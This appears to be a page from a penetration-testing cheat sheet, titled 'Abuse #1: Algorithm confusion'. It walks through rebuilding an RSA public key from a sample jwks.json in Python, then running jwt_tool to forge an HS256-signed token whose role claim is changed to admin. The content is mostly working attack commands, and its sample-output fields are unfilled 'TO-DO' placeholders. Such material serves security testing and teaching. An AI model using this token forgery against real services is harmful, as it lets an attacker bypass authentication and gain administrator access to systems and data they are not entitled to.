Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1: Algorithm confusion
0. Sample jwks.json
{
"keys": [
{
"kty": "RSA",
"use": "sig",
"alg": "RS256",
"n": "<BASE64_n>",
"e": "AQAB"
}
]
}
Sample Output:
TO-DO1. Create a public key
# Invoking python interpreter
python3
Sample Output:
TO-DOfrom base64 import urlsafe_b64decode
Sample Output:
TO-DOfrom Crypto.PublicKey import RSA
Sample Output:
TO-DOe = int.from_bytes(urlsafe_b64decode(b'AQAB'))
Sample Output:
TO-DOn = int.from_bytes(urlsafe_b64decode(b'<BASE64_N>'))
Sample Output:
TO-DOkey = RSA.construct((n, e))
Sample Output:
TO-DO# Save it to public.pem
print(key.exportKey().decode())
Sample Output:
TO-DO2. Forge a jwt
# For example, modify role to admin
python3 jwt_tool.py -S hs256 -k public.pem -I -pc role -pv admin <JWT>
Sample Output:
TO-DORef: jwt_tool